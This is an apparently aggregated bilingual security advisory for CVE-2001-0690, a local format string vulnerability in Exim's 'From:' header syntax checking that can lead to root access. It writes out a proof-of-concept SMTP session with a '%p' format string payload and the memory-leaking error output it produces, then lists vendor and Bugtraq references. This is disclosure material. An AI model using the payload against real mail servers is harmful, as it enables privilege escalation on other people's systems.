https://www.exploit-db.com/exploits/20900
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200109-092

CVE(CAN)ID:CVE-2001-0690Exim是一个开放源码的自由软件，它可以在Unix下提供邮件传输代理功能(MTA)。Exim存在一个格式串溢出漏洞，可能允许本地攻击者获取root权限。如果Exim打开了”语法检查”(缺省是关闭的)选项，则当邮件中的”From:’地址栏中包含格式串时，将触发格式串溢出漏洞。攻击者可以修改任意内存地址，并且获取root权限。

source: http://www.securityfocus.com/bid/2828/info

Exim is a free, open-source Mail Transfer Agent for Unix systems.

Exim is vulnerable to a locally exploitable format string attack which may compromise root access. The vulnerability exists only when the 'syntax checking' mode is turned on, which it is not by default.

The vulnerability has to do with handling of the hostname string in an email address argumenting the 'From:' field. If the syntax checking is enabled, then this vulnerability can be exploited to execute arbitrary code with root priviliges. 

Try this:
===8<======8<=======8<======
lez:~$ /usr/sbin/exim -bS
mail from:lez@lez
rcpt to:hax0r@lez
data
From:@@%p%p%p%p%p%p%p%p%p%p

.
===8<======8<=======8<=======

Somewhere in the answers you should see:
550 Syntax error in 'From' header: domain missing or malformed: failing address is:
@@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40

来源:REDHAT
名称:RHSA-2001:078
链接:http://www.redhat.com/support/errata/RHSA-2001-078.html
来源:DEBIAN
名称:DSA-058
链接:http://www.debian.org/security/2001/dsa-058
来源:BUGTRAQ
名称:20010606lil’eximformatbug
链接:http://archives.neohapsis.com/archives/bugtraq/2001-06/0041.html
来源:XF
名称:exim-syntax-format-string(6671)
链接:http://xforce.iss.net/static/6671.php
来源:BID
名称:2828
链接:http://www.securityfocus.com/bid/2828
来源:CONECTIVA
名称:CLA-2001:402
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio;=000402